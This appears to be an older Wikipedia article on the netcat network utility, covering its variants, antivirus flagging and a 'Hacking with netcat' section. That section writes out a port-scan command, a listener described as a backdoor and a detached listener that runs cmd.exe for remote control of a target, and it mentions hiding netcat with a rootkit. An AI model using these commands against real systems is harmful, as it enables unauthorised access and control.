Netcat
From Wikipedia, the free encyclopedia
| netcat | |
 |
|
| Developer: | *Hobbit* |
|---|---|
| Latest release: | 1.10 / March 20, 1996 |
| OS: | UNIX |
| Use: | Network utility |
| License: | BSD License |
| Website: | http://netcat.sourceforge.net/ |
- The correct title of this article is netcat. The initial letter is shown capitalized due to technical restrictions.
In computing, netcat is a network utility for reading from and writing to network connections on either TCP or UDP. It is designed in a thin and simple way, which makes it easy to incorporate in larger applications. Because of its versatility, netcat is also called the "TCP/IP Swiss Army knife".
Netcat was twice voted the fourth most useful network security tool in polls conducted by insecure.org on the nmap users mailing list[1].
Contents |
[edit] Variants
The original version of netcat is a UNIX program. Its author is known as *Hobbit*. He released version 1.1 in March of 1996.
Netcat is fully POSIX compatible and there exist several implementations, including a rewrite from scratch known as GNU netcat, which is maintained by Giovanni Giacobbi and a MS-Windows version of netcat created by Chris Wysopal. Also, an encrypted version of netcat named Cryptcat is available for use when security is of concern. Andreas Bischoff has ported the Windows version to Windows CE (Pocket PC and Handheld PC).
On some systems, modified versions or similar utilities go by the command name(s) nc, ncat, pnetcat, socat, sock, socket, spd.
[edit] Security risks
Netcat is sometimes detected and flagged up as a security risk by virus scanners and spyware removal software, which may simplistically categorise it as a remote administration tool[1], or treat it as a security cracking tool which may have been planted by malicious software[2]. Such warnings from security software do not however take into account its many legitimate uses as a flexible network data transfer tool. However, concerns may be justified in so far as netcat can serve as a tool for undesirable activity such as port scanning or as a vehicle with which to exploit vulnerabilities, and can be configured to allow unsecured remote access to a system. It is also important to note that unless compiled with the "GAPING_SECURITY_HOLE" flag, it is harmless to have on your system.
[edit] Hacking with netcat
With netcat you can port scan:
nc -v -w 2 -z $targetip $port-range
It can be used to connect to any port the same as telnet can; however, it does not include the same EOF problem telnet does, so it will allow your network output to finish. It can also be used to connect to UDP ports. The most likely feature of netcat to be used as a security exploit is the ability to run as both a server and a client. It is rather simple to include netcat into any application you write then execute:
nc -l -p #port-number
and you have a backdoor in the system.
Netcat can be used to host a file server. By hooking it up with the vanquish root kit at rootkit.com we can effectively make netcat hidden on a machine. Netcat working as a backdoor can execute a cmd.exe and transfer control to a hacker. He can then transfer the files he wants from the target computer.
nc -L #targetip -p #port-number -v -t -d -e cmd.exe
-v for verbose, -d to run detached from console, -e to execute any program. Connect to the target using
nc -v #targetip #port-number
[edit] See also
[edit] External links
- nc(1) man page via OpenBSD
- netcat.sourceforge.net GNU netcat
- www.vulnwatch.org/netcat/ Netcat for Windows
- prt.fernuni-hagen.de/~bischoff/wince/Andreas_WINCE_stuff.html#netcat Netcat for Windows CE (PocketPC)]
- Using Netcat for backup
- http://www.networknewz.com/networknewz-10-20031020NetCatSecurity.html Hacking with netcat
